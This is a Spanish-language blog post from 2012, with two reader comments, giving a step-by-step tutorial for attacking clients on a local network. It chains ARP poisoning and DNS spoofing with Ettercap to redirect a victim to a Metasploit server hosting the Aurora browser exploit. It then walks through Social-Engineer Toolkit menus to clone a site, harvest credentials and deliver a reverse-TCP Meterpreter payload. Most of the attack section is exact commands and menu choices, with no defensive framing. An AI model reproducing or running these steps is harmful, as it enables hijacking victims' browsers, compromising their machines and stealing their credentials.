viernes, 3 de febrero de 2012

Ataques sociales – Ataques en LAN

    Ataques sociales – Ataques en LAN

Una vez tenemos clientes asociados a nuestro punto de acceso, estos se encuentran en nuestra red, con lo que son vulnerables a multitud de ataques, yo mostraré un ejemplo de un DNS-spoofing con Ettercap + Metasploit y otro con S.E.T. .

DNS-spoofing con Ettercap y Metasploit

>>>>> Información DNS (Wikipedia):

>>>>> Información DNS-spoofing (Wikipedia):
  1. El primer paso sera configurar el fichero para las redirecciones del DNS en /usr/local/share/ettercap/etter.dns:
nano /usr/local/share/ettercap/etter.dns

Donde:
  • www.microsoft.com –> es la dirección que cuando la víctima visite será redirigida.
  • A –> significa que es una dirección IPv4.
  • 192.168.0.198 –> es la dirección a la que será redirigida la víctima cuando se conecte a www.microsoft.com
  1. El siguiente paso es lanzar Metasploit:
    msfconsole
  1. Ahora configuramos los parámetros para lanzar el exploit aurora que afecta a los navegadores:
    use exploit/windows/browser/ms10_002_aurora
    set SRVHOST 192.168.0.198
    set SRVPORT 80
    set URIPATH /

Si queremos información sobre el exploit y los parámetros que requiere tenemos el comando show options.
  1. El siguiente paso es lanzar Ettercap junto con el plugin para DNS-spoofing:sintaxis → ettercap -T -q -M ARP -P dns_spoof -i <interfaz conectada a la red> /<ip objetivo>/ //
ettercap -T -q -M ARP -P dns_spoof -i eth1 /192.168.0.200/ //
  1. Por último lanzaremos el exploit desde la ventana de metasploit y esperaremos que la víctima visite la dirección “envenenada” para que sea redirigida y visite la web del exploit.



    S.E.T.
>>>>> Información S.E.T.:

NOTA: El siguiente ejemplo de ataque en LAN lo vi en un vídeo de un curso de Backtrack 5 en español ( muy recomendable) y me pareció muy “potente” por lo que he querido hacerle referencia en este texto.
  1. Abrimos S.E.T.:
cd /pentest/exploits/set
./set
  1. A continuación actualizamos Metasploit y S.E.T.:
  1. Lo siguiente será ir interactuando por los menús, para mas información sobre los diferentes ataques mirad los vídeos ;)
1 – Social-Engineering Attacks

2 – Website Attack Vectors

7 – Multi-Attack Web Method

2 – Site Cloner
url del sitio que queremos clonar

1 – Java Applet Attack Method
2 – Metasploit Browser Exploit Method
3 – Credential Harvester Attack Method
6 – Web Jacking Attack Method
8 – I'm finished and want to proceed with the attack

11
PORT of the listener [443]: //dejamos este campo vació y pulsamos enter
Create a Linux/OSX reverse_tcp meterpreter Java Applet payload also? [yes|no]: yes
25

Ahora empezarán a cargarse los exploits:



Y ya tenemos listo S.E.T. esperando a que un cliente se conecte a la dirección mostrada (en este caso 192.168.1.41), con lo que solo nos quedará realizar un DNS-spoofing para que un objetivo se conecte a nuestra máquina.
Cuando se conecte alguien veremos como reacciona S.E.T.:

2 comentarios:

  1. Para revertir todo proceso y dejar todo como antes solo basta con "Ctrl+C" en todas las ventanas o ocupas algun comando.

    ResponderEliminar
    Respuestas
    1. Metasploit con ctrl+c basta para cerrarlo. Sobre ettercap si utilizas la versión con interfaz tiene su propia opción el el menú. Si usas la versión desde línea de comandos, sino recuerdo mal, con Ctrl+C finalizaba correctamente.

      Eliminar